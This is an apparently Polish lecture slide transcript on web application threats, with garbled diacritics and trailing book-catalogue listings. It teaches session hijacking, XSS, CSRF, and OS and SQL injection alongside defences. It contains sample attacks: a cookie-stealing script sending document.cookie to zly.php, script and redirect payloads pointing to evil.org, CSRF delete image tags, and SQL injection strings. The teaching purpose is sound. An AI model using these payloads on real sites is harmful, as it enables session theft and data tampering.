Zagro enia aplikacji internetowych. Dr in. Marek Mi osz

Wielkość: px
Rozpocząć pokaz od strony:

Download "Zagro enia aplikacji internetowych. Dr in. Marek Mi osz"

Transkrypt

1 Zagro enia aplikacji internetowych Dr in. Marek Mi osz

2 Plan Aplikacja internetowa Proste zagro enia Ukryte parametry na stronie Manipulacje parametrami (doklejanie, zmiana cie ki) Wstrzykiwanie (ang. Injection) zawarto ci (tre ci, HTML, kodu programowego i SQL) Ataki na sesje (c) M.Mi osz 2

3 Aplikacja internetowa Dynamiczne strony WWW Kod wykonywany na serwerze Manipulowanie danymi przez klienta Wspó praca z serwerem bazy danych i innych us ug Komunikacja z klientem przy pomocy protoko u http (https) Dane pobierane przy pomocy formularzy HTML i przesy ane metod GET lub POST Klient standardowa przegl darka WWW (c) M.Mi osz 3

4 Aplikacja internetowa - architektura Przegl darka.ini Klient Statyczne strony Multimedia Serwer Serwer Aplikacja Programy Serwer aplikacji.ini BD Serwer BD.ini Inne serwery.ini (c) M.Mi osz 4

5 Przyk ady technologii CGI Common Gateway Interface (uruchamianie skryptów zwykle w Perlu, Phyton, PHP czy VB, polece SO) ASP - Active Server Pages (MS, VB Script lub C#); obecni e ASP.NET JSP Java Server Pages J2EE (JSP/ Servlet/EJB) Oracle 9i PHP (c) M.Mi osz 5

6 Wzrost zagro e Powszechna dost pno aplikacji Anonimowi klienci Przeno no oprogramowania Stosowanie standardów (ogólnie znanych) Wysoki poziom abstrakcj i danych Jawno kodu (HTML, JavaScript) Skomplikowane j zyki programowania oraz konfiguracje wykonawcze (np. MySQL serwer + PHP parser + Apache + pliki HTML, CSS i inne) (c) M.Mi osz 6

7 Jeden z problem ów Konieczno utrzymania sesji w bezstanowym pr otokole http Rozwi zania: Ukryte pola w formularzach Parametry wywo ania (stan sesji po stronie serwera, ale Id po stronie klienta) Cookies IP, MAC Wszystko po stroni e klienta ;-( (c) M.Mi osz 7

8 Proste zagro enia Nazewnictwo plików ( atwe do odgadni cia -> pobrania poza aplikacj ), np. form_11.html Stare wersje plików (mo liwo pobrania bez wykonani a; np. plik.jsp a plik.jsp.old) Istotne informacje w komentarzach kodu HTML (automat ycznie wstawiane przez narz dzia, programistów, znaczniki META) <!-- <P align="center"><a href="askbillgates.aspx"> <IMG alt="zapytaj Billa Gatesa!" src="img/askbillgmonitor.jpg" border="0"></a></p> --> (w CodeGuru ;-)) (c) M.Mi osz 8

9 R czne pobranie (c) M.Mi osz 9

10 Badanie rodowiska wst p do ataku Analiza ród a (HEAD, OPTI ONS, META) Analiza zwracanych b dów (np. 404) Analiza komunikatów na nieznany typ pliku (np. asp czy exe) Zmiana danych wej ciowych w celu wywo ania b du skryptu (c) M.Mi osz 10

11 Strona z b dem Error 404 wykladowcy.wspa.edu.pl Wed Jan 2 09:28: Apache (c) M.Mi osz 11

12 Ukryte parametry Zapami tywanie zmiennych po stroni e klienta: <input type="hidden" name="nr" value="3335w" /> Niewidoczne na formul arzach ale widoczne w tek cie ród owym Zapami tywanie istotnych danych -> zagro enie (c) M.Mi osz 12

13 Ukryte parametry - modyfikacja GET adres w przegl darce ( atwa zmiana); warto ci max. 100 znaków; struktura: URL?name=value&name=value POST (dla d ugich warto ci zmiennych lub nie- ASCII): Zapisanie pliku HT ML, zmiana warto ci ukrytego parametru i uruchomienie pliku Zastosowanie lokalnego proxy, modyfikuj cego w locie ruch HTML (c) M.Mi osz 13

14 Lokalne proxy Dzia a lokalnie na stacji intruza Adres i port proxy nale y skonfigurowa w przegl darce Przechwytuje i modyfikuje ruch w locie Najbardziej znany: (zablokowane), ale Odysseus (dost pny min. (c) M.Mi osz 14

15 Doklejanie parametr ów Odgadni cie/podejrzenie nazwy zmiennej Brak inicjacji zmiennej w kodzie Doklejenie jej w linii lub przez proxy Przyk ad: KOD: if (sprawdz_w_bazie($login, $pass)) {$czyok= OK }; if ($czyok == OK ) { JEST OK } else { BŁĄD }; (c) M.Mi osz 15

16 Obs uga sytuacji specjalnych Wszystkie wyj tki/b dy/b dne dane powinny by obs u one przez aplikacj Sytuacja specjalna np. brak parametru lub niew a ciwy format danych parametru lub niew a ciwa warto (poza zakresem) Mo liwo zaburzenia pracy aplikacji (logiki lub unieruchomienie) (c) M.Mi osz 16

17 Cookies (1) Czym s? Pliki tekstowe przechowywane u klienta (konieczno udost pnienia opcji zapisu) Przechowuj (nazwa+warto ) dane: Nazwa ciasteczka Domena Czas wa no ci (uwaga na zegar klienta!) Inne (aplikacja) Zapis na danie serwera: Set-Cookie: nazwa=wartość; expires=data; path=ścieżka; domain=domena; secure Przyk ad: eprawniktrackingd1ca ad8e676db26cc6d1463e5eprawnik.pl/prawo/ * (c) M.Mi osz 17

18 Cookies (2) Cookies powinny by dost pne tylko dla danego serwera (ale...) Mo na przechwytywa i modyfikowa przy pomocy lokalnego proxy Mo na pozyska ID sesji lub domy li si innego ID sesji -> wznowi lub przej sesj Mo na modyfikowa parametry (najcz ciej flaga/status autoryzacji klient a), np.: setcookie( autoryzacja, tak ) Modyfikowa cookies mo na te w przypadku protoko u SSL (lokalne proxy realizuje przej cie, atak man in the middle ) (c) M.Mi osz 18

19 Man in the middle SSL(1) Brak szyfrowania SSL(2) Przegl darka Klient Lokalne proxy Serwer (c) M.Mi osz 19

20 Podszycie si pod sesj Wymagana jest znajomo identyfikatora sesji (tokena) Zwykle w cookie, ale te w parametrze GET/POST lub ukrytym polu w FORM Sk d? Pods ucha Przewidzie Ukra Mo na omin mechanizmy autentykacji klienta przej cie lub wznowienie sesji (np. administratora aplikacji) (c) M.Mi osz 20

21 Token Losowy nieprzewidywalny Ograniczony czasowo by unikn mo liwo ci brutalnego ataku Dostatecznie d ugi - by unikn mo liwo ci brutalnego ataku oraz losowego odgadni cia Zale ny od IP klienta by uniemo liwi wznowienie Szyfrowany (cooki przez SSL) by ograniczy mo liwo przechwycenia (c) M.Mi osz 21

22 Sk d pochodzi? W wi kszo ci przypadków z API (np. parsera PHP): JSESSIONID (JSP), PHPSESSID (PHP), ASPSESSIONID (Microsoft ASP) Niektóre API maj /mia y przewidywalne algorytmy (np. IBM WebSphere 4.0) ;-( (c) M.Mi osz 22

23 Wstrzykiwanie (ang. Injection) Niechciane przekazanie nieoczekiwanych danych do aplikacji Wstrzykni cie: Niechcianej tre ci Kodu HTML/skryptu Polecenia syst emu operacyjne go Polecenia SQL (c) M.Mi osz 23

24 Wstrzykni cie tre ci Wprowadzenie tre ci niepo danej do serwisu (wulgaryzmy, seks, nazi zm itp.) Klasyczny problem ró nego typu forów, ankiet otwartych, ocen produkt ów itp. Walka: R czna moderacja (trudna i kosztowna) Przeszukiwanie s ownikowe (ma o efektywne dla sprytnych wandali) (c) M.Mi osz 24

25 Wstrzykni cie kodu HTML Atak na innego u ytkownika przez napastnika z wykorzystaniem aplikacji internetowej jako nosiciela Istota: Wykonanie kodu HTML (cz sto w po czeniu ze skryptem) przez przegl dark ofiary Mo liwy kiedy aplikacja pobiera dane i je publikuje bez nale ytego sprawdzenia Cross-Site Scripting (XSS) skrypty (klient ufa apl) Cross-Site Request Forgeries (CSRF/XRF) wykorzystanie w a ciwo ci http, pobieranie sk adników strony (apl. ufa klientowi) (c) M.Mi osz 25

26 Proste wstrzykni cie HTML Wykorzystanie znaczników HTML: Przypadkowe zepsucie strony (zapomnienie wsta wienia zamykaj cego znacznika lub znaku spacjalnego) Wykorzystanie <FORM> do pobrania danych od klienta Nieoczekiwane dla klienta przej cia do innej strony: <a href= > Zobacz </a> Wywo anie skryptu bez wied zy administratora (napastnik pozostawia, a admin na swoje sesji uruchami a) - CSRF: <IMG src="admin.php?delete=13"> <IMG style="display: none;" src="admin.php?delete=13"> Ukrycie komunikatu braku obrazu (c) M.Mi osz 26

27 Pomy ka <TR> <TD colspan=2 bgcolor="#ffffcc"> <font size="2"> <b> Pomy ka Wiadomo : <br> </b> <a href=" > co </a></font> </TD> </TR> <TR> <TD colspan=2> <form method="post" name="form2" action="news.php?action=usun " style="font-size: 10px"> Przycisk nieaktywny (c) M.Mi osz 27

28 Rezultat wstawienia <a> (c) M.Mi osz 28

29 Wstrzykiwanie znak ów Wstawianie niedozwolonych znaków do URI (standard: Uniform Resource Identifiers (URI): Generic Syntax, ), URL: Zarezerwowanych: ; /? & = + $, Steruj cych: ENTER, Esc, Null Znaczników: <> Kodowanie procentowe: %cc (c- cyfra heksadecymalna), np. %20 SPACE (ASCII kod: 32), a % koduj e si jako %25 Wielokrotne kodowani e, np. %255c daje / to samo: %25%3 5%63 (c) M.Mi osz 29

30 Wstrzykni cie skryptu Wykorzystanie znaczników <SCRIPT>, <OBJECT>, <A PPLET> czy <EMBED> Przyk ady: Hello World! <SCRIPT>zły kod</script> Hello World! <EMBED SRC="http://www.paedophile.com/rape.mov"> <A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>"> Go to trusted.org</a> (c) M.Mi osz 30

31 Inne wstrzykni cia z ego kodu Wykorzystanie zdarze w interfejsie: <b onmouseover="self.location.href='http://ev il.org/'"> bolded text</b> Wywo anie b du i zwrot kodu: (c) M.Mi osz 31

32 Przyk ad b du Warning: unlink(/home/wspa/www/wykladowcy.wspa.edu.pl/wykladowc a/pliki/marekm/upload/./nowy_) [function.unlink]: No such file or directory in /home/wspa/www/wykladowcy.wspa.edu.pl/wykladowca/pl iki/marekm/wykladowca.php on line 523 Warning: rmdir(/home/wspa/www/wykladowcy.wspa.edu.pl/wykladowc a/pliki/marekm/upload/./2005-6_sesja_zimowa/) [function.rmdir]: Directory not empty in /home/wspa/www/wykladowcy.wspa.edu.pl/wykladowca/ pliki/marekm/wykladowca.php on line 517 (c) M.Mi osz 32

33 XCC kradzie Cookies Po stronie serwera: <SCRIPT type="text/javascript"> var adr = 'zly.php?ciasteczka=' + escape(document.cookie); var obr = '<IMG src="' + adr + '">'; document.write(obr); </SCRIPT> U klienta (po wykonaniu skryptu): <IMG src= zly.php?ciasteczka=zawartość_cookie > Otwarcie strony powoduje automatyczne przes anie Cookie oraz akcj zly.php (np. zapisanie Cookie oraz odes anie rysunku) Escape() zamienia znaki specjalne na %nn (wys anie URI) Pobranie Cookie Wpisanie warto ci zmiennej obr (c) M.Mi osz 33

34 Atak CSRF na lokaln aplikacj (c) M.Mi osz 34 Shiflett C.: Foiling Cross-Site Attacks, PHP Architect nr 10/2003

35 Wstrzykni cie polecenia SO Aplikacja przekazuje do klienta parametry do wywo ania systemowego: Funkcji API Polecenia SO Je li parametry nie s sprawdzone przed wywo aniem to mo na: Doklei swoje parametry Wywo a swoje polecenie SO (np. exec(), system()) (c) M.Mi osz 35

36 Przyk ad <HTML> <?php passthru ( " /home/user/metoda ". $_GET['USER_INPUT'] );?> Mo na: Wykona polecenie SO (dir, copy czy ld) Wykona ci g polece, wykorzystuj c: Nadpisa plik na serwerze: > plik Ochrona: escapeshellarg() escapeshellcmd() (c) M.Mi osz 36

37 Wstrzykni cie SQL Atak na warstw danych Przyczyna: Brak weryfikacji parametrów przekazywanych od klienta do aplikacji Konstrukcja zapyta SQL poprzez sklejanie statycznego kodu SQL z warto ciami parametrów Przyk ad: $sql= select * from pytania where id=$id ; $wynik = mysql_query($sql); A co je li by o wcze niej: $id=$_get[ user_input ]; I podano: 1 or 1=1 (c) M.Mi osz 37

38 Typowe ataki Niekontrolowany dost p do danych: UNION SELECT Zmiana logiki dzia ania aplikacji: OR 1=1 Wykonanie wielu polece z jednej linii (nie we wszystkich SZBD jest to mo liwe, MS SQL Server - tak) usuni cie, modyfikacja danych (dowolne polecenie SQL): ; DELETE * FROM ; UPDATE (c) M.Mi osz 38

39 Przyk ad Kod: $sql= select count(*) from uwierz where uzytkownik=$uzytkownik. and haslo=$haslo ; Zmienna $uzytkownik= jakis a $haslo z formularza ma warto : OK OR 1=1 Wynikowe zapytanie: select count(*) from uwierz where uzytkownik=jakis AND haslo=ok OR 1=1; (c) M.Mi osz 39

40 GOOGLE hacking (1) Obej cie zabezpiecze przez roboty: [PDF] Projektowanie aplikacji J2EE w architekturze Model-View-Controller Format pliku: PDF/Adobe Acrobat - Wersja HTML JSP. (View). Klasa. zewnętrzna. (Model) Serwlet. (Controller) Rys. 1. Schemat przykładowej aplikacji w architekturze MVC Podobne strony Pobranie 03.pdf i wszystkich: 01.pdf, 02.pdf, Ale y/pdf daje: Forbidden You don't have permission to access /konf_05/materialy/pdf/ on this server. Apache Server at Port 80 (c) M.Mi osz 40

41 GOOGLE hacking ys_problemu Komunikaty b dów: Warning: mysql_query() [function.mysql-query]: Unable to save result set in /www/pasjagsm_www/www/forum/db/mysql4.php on line 148 Critical Error! message_die() was called multiple times. Error #1 Could not obtain common word list Line : 323 File : /www/pasjagsm_www/www/forum/includes/functions_search.php SQL : SELECT word_id FROM phpbb_search_wordmatch GROUP BY word_id HAVING COUNT(word_id) > SQL message: MySQL server has gone away Error #2 Error doing DB query: pw count fetch Line : 1759 File : /www/pasjagsm_www/www/forum/includes/page_header.php SQL : SELECT COUNT(*) AS pw_count FROM phpbb_privmsgs pm WHERE pm.privmsgs_to_userid = 4605 AND pm.privmsgs_type <> 2 GROUP BY pm.privmsgs_to_userid SQL message: MySQL server has gone away Please, contact the Administrator. Thank you. (c) M.Mi osz 41

42 Ochrona aplikacji (1) Ograniczenie odpowiedzi serwera z parametrami klienta (zamiast: Witaj Marek mo na: Witaj U ytkowniku) Ograniczenie d ugo ci odpowiedzi klienta (ograniczenie od strony klienta d ugo ci a cucha ale te sprawdzenie w aplikacji) Filtrowanie i usuni cie gro nych znaków (szczególnie < i >, ale te i, czy ;) ale uwaga na specyficzne kody, np. < to te /x3c, ew. zamiana znaków < na &lt (w ASP: HTMLEncode() w PHP: htmlentities() ) (c) M.Mi osz 42

43 Ochrona aplikacji (2) Analiza warto ci parametrów wej ciowych (otrzymywanych od klienta) i wyj ciowych (publikowanych na stronie lub zapisywanych do BD) Analiza sk adni i blokowanie niepo danych znaczników, szczególnie <SCRIPT> i <EMBED>, <OBJECT> U ycie metody POST w formularzach Weryfikacja cookies przed u yciem (i kontrola czasu trwania sesji) (c) M.Mi osz 43

44 Ochrona aplikacji (3) Wygenerowanie identyfikatora sesji na stronie wej ciowej i kontrola na pozosta ych, cz sto zawiera sum kontrolna IP klienta, np. i w tym przypadku serwer utrzymuje stan sesji (demarkacja sesji, klient dostarcza ID parametr lub cookie) Dok adna znajomo specyfikacji/standardów sieciowych Precyzyjne ustawienia parametrów serwerów, parserów i SO (c) M.Mi osz 44

45 Ochrona aplikacji - architektura Wprowadzenie kontrolera obs uguj cego ca o komunikacji z klientem Wprowadzenie jednorazowego tokena zapobiega duplikacji przesy anych danych, przechwycenia sesji itp. (musi zaistnie zgodno tokena z wys anym w poprzednim pliku) Separacja warstw: biznesowej i prezentacji, a tak e danych Ukrycie zasobów przed klientem (c) M.Mi osz 45

46 Zabezpiecz swoj aplikacj Wiedza to umo liwi

E-commerce. Genialnie proste tworzenie serwisów w PHP i MySQL

E-commerce. Genialnie proste tworzenie serwisów w PHP i MySQL Idź do Spis treści Przykładowy rozdział Skorowidz Katalog książek Katalog online Zamów drukowany katalog Twój koszyk Dodaj do koszyka Cennik i informacje Zamów informacje o nowościach Zamów cennik Czytelnia

Bardziej szczegółowo

Bezpieczeñstwo aplikacji tworzonych w technologii Ajax

Bezpieczeñstwo aplikacji tworzonych w technologii Ajax Bezpieczeñstwo aplikacji tworzonych w technologii Ajax Autor: Billy Hoffman, Bryan Sullivan T³umaczenie: Robert Górczyñski ISBN: 978-83-246-1693-0 Tytu³ orygina³u: Ajax Security Format: 168x237, stron:

Bardziej szczegółowo

Wszystkie znaki występujące w tekście są zastrzeżonymi znakami firmowymi bądź towarowymi ich właścicieli.

Wszystkie znaki występujące w tekście są zastrzeżonymi znakami firmowymi bądź towarowymi ich właścicieli. Tytuł oryginału: Linux Shell Scripting Cookbook Tłumaczenie: Piotr Pilch ISBN: 978-83-246-3886-4 Copyright Packt Publishing 2011. First published in the English language under the title Linux Shell Scripting

Bardziej szczegółowo

Administracja systemu Windows Sewer 2003

Administracja systemu Windows Sewer 2003 Administracja systemu Windows Sewer 2003 mrat Zadania egzaminacyjne omawiane w tym rozdziale Zarz dzanie zdalne serwerami» Zarz dzanie serwerem przy u yciu programu Remote Assiscance (Pomoc zdalna)» Zarz

Bardziej szczegółowo

Autorstwo: Sławomir Orłowski (wstęp, rozdziały 1-8), Maciej Grabek (rozdział 9).

Autorstwo: Sławomir Orłowski (wstęp, rozdziały 1-8), Maciej Grabek (rozdział 9). Autorstwo: Sławomir Orłowski (wstęp, rozdziały 1-8), Maciej Grabek (rozdział 9). Wszelkie prawa zastrzeżone. Nieautoryzowane rozpowszechnianie całości lub fragmentu niniejszej publikacji w jakiejkolwiek

Bardziej szczegółowo

Wszystkie znaki występujące w tekście są zastrzeżonymi znakami firmowymi bądź towarowymi ich właścicieli.

Wszystkie znaki występujące w tekście są zastrzeżonymi znakami firmowymi bądź towarowymi ich właścicieli. Wszelkie prawa zastrzeżone. Nieautoryzowane rozpowszechnianie całości lub fragmentu niniejszej publikacji w jakiejkolwiek postaci jest zabronione. Wykonywanie kopii metodą kserograficzną, fotograficzną,

Bardziej szczegółowo

J2ME. Praktyczne projekty. Wydanie II

J2ME. Praktyczne projekty. Wydanie II Idź do Spis treści Przykładowy rozdział Katalog książek Katalog online Zamów drukowany katalog Twój koszyk Dodaj do koszyka Cennik i informacje Zamów informacje o nowościach Zamów cennik Czytelnia Fragmenty

Bardziej szczegółowo

Struktura danych (ang. data structure) - sposób uporz dkowania informacji w komputerze. Na strukturach danych operuj algorytmy.

Struktura danych (ang. data structure) - sposób uporz dkowania informacji w komputerze. Na strukturach danych operuj algorytmy. OPRACOWA : K77. Przeczytajcie wszystko chocia raz a na pewno b dziecie wi cej wiedzie J Uwaga do wszystkich przysz ych magistrów: Po wylosowaniu zagadnienia mówcie o rzeczach, które s dla Was zrozumia

Bardziej szczegółowo

XX najpopularniejszych atakow w sieci na twoj komputer. Wykrywanie, usuwanie skutkow i zapobieganie

XX najpopularniejszych atakow w sieci na twoj komputer. Wykrywanie, usuwanie skutkow i zapobieganie XX najpopularniejszych atakow w sieci na twoj komputer. Wykrywanie, usuwanie skutkow i zapobieganie Autor: Maciej Szmit, Mariusz Tomaszewski, Dominika Lisiak, Izabela Politowska ISBN: 83-246-1646-2 Format:

Bardziej szczegółowo

Sieci VPN. Zdalna praca i bezpieczeñstwo danych

Sieci VPN. Zdalna praca i bezpieczeñstwo danych Sieci VPN. Zdalna praca i bezpieczeñstwo danych Autor: Marek Serafin ISBN: 978-83-246-1521-6 Format: B5, stron: 160 Wydawnictwo Helion ul. Koœciuszki 1c 44-100 Gliwice tel. 032 230 98 63 e-mail: helion@helion.pl

Bardziej szczegółowo

Small Business Server 2008 PL. Instalacja, migracja i konfiguracja

Small Business Server 2008 PL. Instalacja, migracja i konfiguracja Idź do Spis treści Przykładowy rozdział Katalog książek Katalog online Zamów drukowany katalog Twój koszyk Dodaj do koszyka Cennik i informacje Zamów informacje o nowościach Zamów cennik Czytelnia Fragmenty

Bardziej szczegółowo

Materiały graficzne na okładce zostały wykorzystane za zgodą Shutterstock Images LLC.

Materiały graficzne na okładce zostały wykorzystane za zgodą Shutterstock Images LLC. Tytuł oryginału: Search Engine Optimization Secrets Tłumaczenie: Rafał Jońca Projekt okładki: Studio Gravite / Olsztyn Obarek, Pokoński, Pazdrijowski, Zaprucki ISBN: 978-83-246-3606-8 Copyright 2011 by

Bardziej szczegółowo

Pozycjonowanie i optymalizacja stron WWW. Jak się to robi. Wydanie III

Pozycjonowanie i optymalizacja stron WWW. Jak się to robi. Wydanie III Idź do Spis treści Przykładowy rozdział Skorowidz Katalog książek Katalog online Zamów drukowany katalog Twój koszyk Dodaj do koszyka Cennik i informacje Zamów informacje o nowościach Zamów cennik Czytelnia

Bardziej szczegółowo

Wszystkie znaki występujące w tekście są zastrzeżonymi znakami firmowymi bądź towarowymi ich właścicieli.

Wszystkie znaki występujące w tekście są zastrzeżonymi znakami firmowymi bądź towarowymi ich właścicieli. Tytuł oryginału: Raspberry Pi User Guide Tłumaczenie: Mikołaj Szczepaniak ISBN: 978-83-246-7313-1 2012 Eben Upton and Gareth Halfacree All Rights Reserved. Authorized translation from the English language

Bardziej szczegółowo

i Wprowadzenie do Windows Server 2003

i Wprowadzenie do Windows Server 2003 i Wprowadzenie do Windows Server 2003 Niniejszy rozdzia nie zawiera zada obj tych egzaminem. Po cz ci zaznajamiaj cej z rodzin produktów Windows Servcr 2003, w rozdziale tym opisane zosta y pewne zagadnienia

Bardziej szczegółowo

Raport kwartalny CERT.GOV.PL lipiec wrzesie 2010

Raport kwartalny CERT.GOV.PL lipiec wrzesie 2010 Raport kwartalny CERT.GOV.PL lipiec wrzesie 2010 1. Informacje dotycz ce zespo u CERT.GOV.PL... 2 2. Statystyki systemu ARAKIS-GOV... 3 3. Statystyki incydentów... 5 4. Istotne podatno ci, zagro enia i

Bardziej szczegółowo

W tym dokumencie: 1 Wprowadzenie ataki na aplikacje. 2 Application Intelligence ochrona przed zagro eniami nowej generacji 3 Warstwy sieci i

W tym dokumencie: 1 Wprowadzenie ataki na aplikacje. 2 Application Intelligence ochrona przed zagro eniami nowej generacji 3 Warstwy sieci i W tym dokumencie: 1 Wprowadzenie ataki na aplikacje. 2 Application Intelligence ochrona przed zagro eniami nowej generacji 3 Warstwy sieci i transportu: konieczna podstawa dla technologii Application Intelligence

Bardziej szczegółowo

Wszystkie znaki występujące w tekście są zastrzeżonymi znakami firmowymi bądź towarowymi ich właścicieli.

Wszystkie znaki występujące w tekście są zastrzeżonymi znakami firmowymi bądź towarowymi ich właścicieli. Wszelkie prawa zastrzeżone. Nieautoryzowane rozpowszechnianie całości lub fragmentu niniejszej publikacji w jakiejkolwiek postaci jest zabronione. Wykonywanie kopii metodą kserograficzną, fotograficzną,

Bardziej szczegółowo

Totally Integrated Automation

Totally Integrated Automation Totally Integrated Automation Poziom zarządzania Poziom operatorski Oprogramowanie przemysłowe Projektowanie Uruchomienie Obsługa Utrzymywanie ruchu Modernizacja i rozbudowa Poziom sterowania SINUMERIK

Bardziej szczegółowo

Wszystkie znaki występujące w tekście są zastrzeżonymi znakami firmowymi bądź towarowymi ich właścicieli.

Wszystkie znaki występujące w tekście są zastrzeżonymi znakami firmowymi bądź towarowymi ich właścicieli. Tytuł oryginału: The Cloud at Your Service Tłumaczenie: Justyna Walkowska Projekt okładki: Jan Paluch ISBN: 978-83-246-3416-3 Original edition copyright 2011 by Manning Publications Co. All rights reserved

Bardziej szczegółowo

Copyright Packt Publishing 2012. First published in the English language under the title Flash ios Apps Cookbook

Copyright Packt Publishing 2012. First published in the English language under the title Flash ios Apps Cookbook Tytuł oryginału: Flash ios Apps Cookbook Tłumaczenie: Joanna Zatorska ISBN: 978-83-246-4993-8 Copyright Packt Publishing 2012. First published in the English language under the title Flash ios Apps Cookbook

Bardziej szczegółowo

Wszystkie znaki występujące w tekście są zastrzeżonymi znakami firmowymi bądź towarowymi ich właścicieli.

Wszystkie znaki występujące w tekście są zastrzeżonymi znakami firmowymi bądź towarowymi ich właścicieli. Wszelkie prawa zastrzeżone. Nieautoryzowane rozpowszechnianie całości lub fragmentu niniejszej publikacji w jakiejkolwiek postaci jest zabronione. Wykonywanie kopii metodą kserograficzną, fotograficzną,

Bardziej szczegółowo

Drupal. Poznaj go z każdej strony!

Drupal. Poznaj go z każdej strony! Idź do Spis treści Przykładowy rozdział Katalog książek Katalog online Zamów drukowany katalog Twój koszyk Dodaj do koszyka Cennik i informacje Zamów informacje o nowościach Zamów cennik Czytelnia Fragmenty

Bardziej szczegółowo

SYSTEM ZARZ DZANIA DOKUMENTAMI PROJEKTU PROTEUS ZAIMPLEMENTOWANY W OpenKM

SYSTEM ZARZ DZANIA DOKUMENTAMI PROJEKTU PROTEUS ZAIMPLEMENTOWANY W OpenKM dr in. Marian Wrzesie, Piotr Ryszawa, Przemys owy Instytut Automatyki i Pomiarów SYSTEM ZARZ DZANIA DOKUMENTAMI PROJEKTU PROTEUS ZAIMPLEMENTOWANY W OpenKM Zaprezentowano implementacj systemu zarz dzania

Bardziej szczegółowo

Wojownik SEO. Sztuka osiągania najwyższych pozycji w wyszukiwarkach

Wojownik SEO. Sztuka osiągania najwyższych pozycji w wyszukiwarkach Idź do Spis treści Przykładowy rozdział Katalog książek Katalog online Zamów drukowany katalog Twój koszyk Dodaj do koszyka Cennik i informacje Zamów informacje o nowościach Zamów cennik Czytelnia Fragmenty

Bardziej szczegółowo

Wprowadzenie... 7 Rozdzia! 1. Infrastruktura klucza publicznego (PKI)... 11 Rozdzia! 2. Tworzenie infrastruktury PKI w Windows Server 2008...

Wprowadzenie... 7 Rozdzia! 1. Infrastruktura klucza publicznego (PKI)... 11 Rozdzia! 2. Tworzenie infrastruktury PKI w Windows Server 2008... Spis tre ci Wprowadzenie... 7 Rozdzia 1. Infrastruktura klucza publicznego (PKI)... 11 1.1. Co to jest PKI?... 12 1.2. Dlaczego PKI?... 13 1.3. Standardy zwi zane z PKI... 15 1.3.1. ITU X.509... 15 1.3.2.

Bardziej szczegółowo

Zintegrowane systemy zarz dzania w procesach logistycznych Integrated management systems in the logistics process

Zintegrowane systemy zarz dzania w procesach logistycznych Integrated management systems in the logistics process Zeszyty Naukowe UNIWERSYTETU PRZYRODNICZO-HUMANISTYCZNEGO w SIEDLCACH Nr 95 Seria: Administracja i Zarz dzanie 2012 dr hab. in. Tadeusz Wa ci ski, prof. PW Politechnika Warszawska Zintegrowane systemy

Bardziej szczegółowo

Godzina dziennie z Web Analytics. Stwórz dobr¹ strategiê e-marketingow¹

Godzina dziennie z Web Analytics. Stwórz dobr¹ strategiê e-marketingow¹ Godzina dziennie z Web Analytics. Stwórz dobr¹ strategiê e-marketingow¹ Autor: Avinash Kaushik T³umaczenie: Tomasz Walczak ISBN: 978-83-246-1880-4 Tytu³ orygina³u: Web Analytics: An Hour a Day Format:

Bardziej szczegółowo

Drupal 7 w praktyce. Własna strona WWW w jeden dzień

Drupal 7 w praktyce. Własna strona WWW w jeden dzień Idź do Spis treści Przykładowy rozdział Skorowidz Katalog książek Katalog online Zamów drukowany katalog Twój koszyk Dodaj do koszyka Cennik i informacje Zamów informacje o nowościach Zamów cennik Czytelnia

Bardziej szczegółowo

Wszystkie znaki występujące w tekście są zastrzeżonymi znakami firmowymi bądź towarowymi ich właścicieli.

Wszystkie znaki występujące w tekście są zastrzeżonymi znakami firmowymi bądź towarowymi ich właścicieli. Wszelkie prawa zastrzeżone. Nieautoryzowane rozpowszechnianie całości lub fragmentu niniejszej publikacji w jakiejkolwiek postaci jest zabronione. Wykonywanie kopii metodą kserograficzną, fotograficzną,

Bardziej szczegółowo